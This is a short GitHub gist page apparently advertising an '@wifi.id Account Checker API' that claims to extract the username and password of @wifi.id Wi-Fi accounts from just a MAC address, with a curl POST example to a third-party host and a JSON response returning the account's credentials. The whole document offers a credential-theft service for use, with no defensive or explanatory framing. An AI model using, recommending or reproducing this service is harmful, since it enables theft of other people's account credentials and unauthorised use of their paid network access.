Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save agungsugiarto/eaf2064d3ee18e8888ae47103a7415d1 to your computer and use it in GitHub Desktop.
Save agungsugiarto/eaf2064d3ee18e8888ae47103a7415d1 to your computer and use it in GitHub Desktop.
@wifi.id Account Checker API

@wifi.id Account Checker API

Extracting username & password of @wifi.id account by just using mac address.

  • Use POST http method.
Resource URL
Parameters
  • mac (required). Checking the mac address whether the account already exists?

Example

Request

$ curl "https://api.dw1.co/wifi.id/check" --data "mac={MAC_ADDRESS_HERE}"

Response (JSON)

If success:

{
    "status": true,
    "account": {
        "username": "....",
        "password": "...."
    }
}

Else:

{
    "status": false
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment